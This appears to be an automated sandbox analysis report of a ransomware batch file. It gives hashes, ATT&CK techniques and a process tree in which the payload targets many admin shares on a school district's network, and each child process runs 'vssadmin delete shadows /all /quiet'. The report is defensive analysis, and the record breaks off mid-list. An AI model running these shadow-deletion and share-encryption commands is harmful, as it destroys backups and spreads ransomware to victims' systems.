4568f9dd1dc8fd256524e78f1d32d009eb0d5acbdc1a9d9507287832808e50e9

Resubmissions

07-02-2023 21:14

230207-z3l7zsfa9w 10

07-02-2023 21:10

230207-z1fx7aff86 10

04-02-2023 03:46

230204-ebzc1sff9s 10

Analysis

max time kernel
2s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
07-02-2023 21:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.bat
Size

7KB
MD5

e0958318a44912e90bb2cd8729cfc9cb
SHA1

00ea479c600bb4e8fb47dfd284518248cbed51db
SHA256

68b1bf6dfcb95c273cf203194083b786a38ae6180a5ea4f9eb030563ddaf851a
SHA512

46d0873c2bbe6c4f6fc50a04a11baf56f4322e12a0f374005ca60c904fd5ee573b9aa44f4657f9f080cec856f98800f48e6acebe333b9d53491419e4cb15449c
SSDEEP

192:991l1D1b1s1Q13161V141e101e121r1R191j11181m1f1RW1X12W1w1c1z1q1N1A:9DbBJ8QF6LIeUemZnDhrMW90l3wsxqTA

Score

9^/10

ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Interacts with shadow copies 2 TTPs 64 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
568	vssadmin.exe
2808	vssadmin.exe
3016	vssadmin.exe
1548	vssadmin.exe
1212	vssadmin.exe
2920	vssadmin.exe
1212	vssadmin.exe
1176	vssadmin.exe
1404	vssadmin.exe
1800	vssadmin.exe
3024	vssadmin.exe
896	vssadmin.exe
2292	vssadmin.exe
2336	vssadmin.exe
3000	vssadmin.exe
3032	vssadmin.exe
2956	vssadmin.exe
2204	vssadmin.exe
2596	vssadmin.exe
2776	vssadmin.exe
2820	vssadmin.exe
2896	vssadmin.exe
2704	vssadmin.exe
108	vssadmin.exe
1508	vssadmin.exe
2480	vssadmin.exe
1088	vssadmin.exe
1928	vssadmin.exe
2572	vssadmin.exe
2108	vssadmin.exe
2004	vssadmin.exe
2580	vssadmin.exe
1624	vssadmin.exe
2960	vssadmin.exe
920	vssadmin.exe
336	vssadmin.exe
1916	vssadmin.exe
972	vssadmin.exe
1732	vssadmin.exe
2792	vssadmin.exe
2840	vssadmin.exe
1032	vssadmin.exe
988	vssadmin.exe
824	vssadmin.exe
2016	vssadmin.exe
2828	vssadmin.exe
2872	vssadmin.exe
2976	vssadmin.exe
2904	vssadmin.exe
2184	vssadmin.exe
2172	vssadmin.exe
2084	vssadmin.exe
2732	vssadmin.exe
968	vssadmin.exe
1532	vssadmin.exe
2060	vssadmin.exe
2304	vssadmin.exe
1628	vssadmin.exe
2888	vssadmin.exe
2984	vssadmin.exe
1984	vssadmin.exe
2684	vssadmin.exe
2588	vssadmin.exe
2604	vssadmin.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 32 IoCs

Processes:

1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exevssadmin.exevssadmin.exe1.exe

pid	process
1520	1.exe
1536	1.exe
1728	1.exe
1340	1.exe
1516	1.exe
1716	1.exe
948	1.exe
1692	1.exe
1900	1.exe
936	1.exe
672	1.exe
1632	1.exe
2040	1.exe
1092	1.exe
1772	1.exe
1144	1.exe
1940	1.exe
956	1.exe
1964	1.exe
1192	1.exe
788	1.exe
924	1.exe
1648	1.exe
1656	1.exe
1084	1.exe
1140	1.exe
1636	1.exe
1588	1.exe
1740	1.exe
988	vssadmin.exe
336	vssadmin.exe
1600	1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exe1.exe1.exe1.exe1.exe1.exe

description	pid	process	target process
PID 1944 wrote to memory of 1520	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1520	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1520	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1520	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1536	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1536	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1536	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1536	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1728	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1728	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1728	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1728	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1340	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1340	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1340	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1340	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1516	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1516	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1516	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1516	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1716	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1716	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1716	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1716	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 948	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 948	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 948	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 948	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1692	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1692	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1692	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1692	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1900	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1900	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1900	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 1900	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 936	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 936	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 936	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 936	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 672	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 672	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 672	1944	cmd.exe	1.exe
PID 1944 wrote to memory of 672	1944	cmd.exe	1.exe
PID 1536 wrote to memory of 1212	1536	1.exe	vssadmin.exe
PID 1536 wrote to memory of 1212	1536	1.exe	vssadmin.exe
PID 1536 wrote to memory of 1212	1536	1.exe	vssadmin.exe
PID 1536 wrote to memory of 1212	1536	1.exe	vssadmin.exe
PID 948 wrote to memory of 568	948	1.exe	vssadmin.exe
PID 948 wrote to memory of 568	948	1.exe	vssadmin.exe
PID 948 wrote to memory of 568	948	1.exe	vssadmin.exe
PID 948 wrote to memory of 568	948	1.exe	vssadmin.exe
PID 1520 wrote to memory of 1628	1520	1.exe	vssadmin.exe
PID 1520 wrote to memory of 1628	1520	1.exe	vssadmin.exe
PID 1520 wrote to memory of 1628	1520	1.exe	vssadmin.exe
PID 1520 wrote to memory of 1628	1520	1.exe	vssadmin.exe
PID 1340 wrote to memory of 2016	1340	1.exe	vssadmin.exe
PID 1340 wrote to memory of 2016	1340	1.exe	vssadmin.exe
PID 1340 wrote to memory of 2016	1340	1.exe	vssadmin.exe
PID 1340 wrote to memory of 2016	1340	1.exe	vssadmin.exe
PID 1716 wrote to memory of 796	1716	1.exe	vssadmin.exe
PID 1716 wrote to memory of 796	1716	1.exe	vssadmin.exe
PID 1716 wrote to memory of 796	1716	1.exe	vssadmin.exe
PID 1716 wrote to memory of 796	1716	1.exe	vssadmin.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1944

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CPS-NUTRIKIDS.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1628

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS21.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1212

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NES-NUTRIKIDS.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1728

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1928

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM05.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2016

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS51.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1516

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1176

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NES-ELLDIR.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:796

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CENTRAL-PAZJLAP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:568

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\JOANNE-LAP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1692

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:824

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4300.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1900

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2064

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4300.IN.NPS.K12.MA.US\D$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:936

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:972

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4300.IN.NPS.K12.MA.US\F$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:672

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4300.IN.NPS.K12.MA.US\H$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1632

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2084

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CPS-VICE-PRINC.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2040

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2596

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\GROUNDS-JP-LAP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1092

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2172

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NHS-DIRFACILITIES.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1772

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2204

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CENTRAL-VB.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1144

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2136

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NHS-FOODMANGER.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1940

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1916

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CENTRAL-ESP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:956

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2108

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\ERICHENS-NES.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1964

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2580

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NHS-JP-CAMERAPC.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1192

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1732

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4000.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:788

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2776

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4000.IN.NPS.K12.MA.US\D$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:924

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2184

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4000.IN.NPS.K12.MA.US\E$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1648

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2732

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1656

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2572

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\E$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1084

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2604

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\PaperCut" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1140

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2808

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\PCClient" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1636

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2820

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\PCDirectPrintMonitor" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1588

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2588

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\PCRelease" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1740

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2840

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\Photos" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:988

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2828

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\SCHOLARSHIPS" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:336

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2872

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\Time Xpress" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1600

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3032

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\NES-Lib-Lab" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:852

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2888

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\NHS001ATechHP" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:1572

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2792

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\RicohPrinters" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:808

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2976

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NISPOS.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:1196

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:1248

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2920

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\D$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:556

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2984

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Groups$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:560

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2336

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\NESUser$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:1296

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y18$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:1780

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2896

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y19$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2072

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:1628

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y20$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2096

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3000

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y21$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2120

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:3008

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y22$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2144

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2904

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y23$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2160

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3016

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y25$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2212

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:896

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y26$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2232

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y28$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2264

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3024

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y29$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2280

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:3040

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y31$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2312

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1548

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NIS-ROOM-111.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2464

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2904

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NESLAB25.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2564

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2684

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM04.IN.NPS.K12.MA.US\WinControlV2$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2556

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2480

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM04.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2548

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1088

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NISBRANNIGAN.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2540

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:920

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NIS-TECH2018.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2532

C:\Windows\SysWOW64\vssadmin.exe
